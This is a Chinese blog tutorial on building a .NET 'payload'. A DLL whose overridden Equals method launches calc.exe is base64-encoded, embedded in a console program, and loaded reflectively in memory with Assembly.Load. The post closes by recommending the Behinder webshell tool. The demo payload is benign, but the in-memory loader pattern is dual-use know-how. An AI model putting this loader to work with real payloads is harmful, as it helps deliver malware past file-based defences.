tnblog
首页
视频
资源
登录

.net 对payload的制作

5667人阅读 2019/9/23 10:54 总访问:2535548 评论:0 收藏:0 手机
分类: .net后台框架

1.准备


1,新建一个ActionNew控制台的项目

2,新建一个ProcessCale类库项目

如图:


2.payload核心部分(ProcessCale.Payload)

Payload.cs:

using System;
using System.Diagnostics;

namespace ProcessCale
{
    class Payload
    {
        public override bool Equals(Object obj)
        {
            Process.Start("calc.exe");
            return true;
        }
    }
}


【注意】:此处我用得有命名空间,可以把命名空间去掉


3.将ProcessCale.dll文件转换base64


代码就懒得写了直接用它这个网站就可以了

Url: https://www.base64encode.org#encodefiles


Copy That


4.ActionNew主体部分

using System;
using System.Reflection;

namespace ActionNew
{
    class Program
    {
        static void Main(string[] args)
        {
            string Payload =   "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAMUmZYsAAAAAAAAAAOAAIiALATAAAAgAAAAGAAAAAAAAQicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAO4mAABPAAAAAEAAAIgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAABYJgAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAASAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAIgDAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAiJwAAAAAAAEgAAAACAAUAeCAAAOAFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAQASAAAAAQAAEQByAQAAcCgPAAAKJhcKKwAGKiICKBAAAAoAKgBCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAADkAQAAI34AAFACAABYAgAAI1N0cmluZ3MAAAAAqAQAABQAAAAjVVMAvAQAABAAAAAjR1VJRAAAAMwEAAAUAQAAI0Jsb2IAAAAAAAAAAgAAAUcVAgAJAAAAAPoBMwAWAAABAAAAEQAAAAIAAAACAAAAAQAAABAAAAAOAAAAAQAAAAEAAAACAAAAAACqAQEAAAAAAAYAAQELAgYAbgELAgYANQDZAQ8AKwIAAAYAXQDBAQYA5ADBAQYAxQDBAQYAVQHBAQYAIQHBAQYAOgHBAQYAdADBAQYASQDsAQYAJwDsAQYAqADBAQYAjwCMAQYASQK6AQoAQQLZAQAAAAABAAAAAAABAAEAAAAQABMAGwBBAAEAAQBQIAAAAADGADoCLQABAG4gAAAAAIYY0wEGAAIAAAABAKYBCQDTAQEAEQDTAQYAGQDTAQoAKQDTARAAMQDTARAAOQDTARAAQQDTARAASQDTARAAUQDTARAAWQDTARAAYQDTARUAaQDTARAAcQDTARAAeQDTARAAiQBQAh4AgQDTAQYALgALADIALgATADsALgAbAFoALgAjAGMALgArAHQALgAzAHQALgA7AHQALgBDAGMALgBLAHoALgBTAHQALgBbAHQALgBjAJIALgBrALwALgBzAMkAGgAEgAAAAQAAAAAAAAAAAAAAAAAbAAAABAAAAAAAAAAAAAAAJAAKAAAAAAAEAAAAAAAAAAAAAAAkALoBAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAFBheWxvYWQAUHJvY2Vzc0NhbGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBvYmoAUHJvY2Vzc0NhbGUuZGxsAFN5c3RlbQBTeXN0ZW0uUmVmbGVjdGlvbgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMARXF1YWxz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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==";
            Assembly myAssebly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
            Object myPaylaod = myAssebly.CreateInstance("ProcessCale.Payload");
            myPaylaod.Equals("");
        }
    }
}


这里的Payload就是复制下载下来的文本


Run:


额外说明:

    最近听网友说国内渗透工具 菜刀是废了,c刀还能用用,最新的是冰蝎

    有兴趣可以去了解一下冰蝎

    Github:https://github.com/rebeyond/Behinder


欢迎加群讨论技术,1群:677373950(满了,可以加,但通过不了),2群:656732739

评价
这一世以无限游戏为使命!
排名
6
文章
6
粉丝
16
评论
8
{{item.articleTitle}}
{{item.blogName}} : {{item.content}}
ICP备案 :渝ICP备18016597号-1
网站信息:2018-2024TNBLOG.NET
技术交流:群号656732739
联系我们:contact@tnblog.net
欢迎加群交流技术